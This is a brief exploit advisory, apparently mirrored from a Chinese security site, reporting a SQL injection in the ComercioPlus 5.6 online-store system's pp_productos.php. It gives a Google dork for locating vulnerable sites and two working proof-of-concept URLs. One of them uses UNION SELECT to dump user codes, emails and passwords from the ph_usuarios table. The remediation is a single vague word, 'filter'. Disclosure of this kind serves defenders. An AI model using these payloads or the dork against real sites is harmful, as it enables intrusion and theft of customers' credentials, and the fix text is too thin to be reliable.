ComercioPlus 5.6 SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

ID MYHACK58:62201128964
Type myhack58
Reporter 佚名
Modified 2011-01-29T00:00:00



ComercioPlus is a use PHP to write to the virtual store system, ComercioPlus 5. 6 edition of the pp_productos. php file exists SQL injectionvulnerability, may lead to sensitive information disclosure.

[+]info: ~~~~~~~~~

Exploit Title: Comerciosonline CMS SQLi

Google Dork: allintext: "Servicio ofrecido por ComerciosOnLine"

Date: 27/01/2011

Author: Daniel Godoy

Author Mail: DanielGodoy[at]GobiernoFederal[dot]com

Author Web:

Software Link: <>

Version: All

Tested on: Linux, Windows

[+]poc: ~~~~~~~~~ http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5-- http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--

[+]Reference: ~~~~~~~~~ <>

Fix: pp_productos. php filter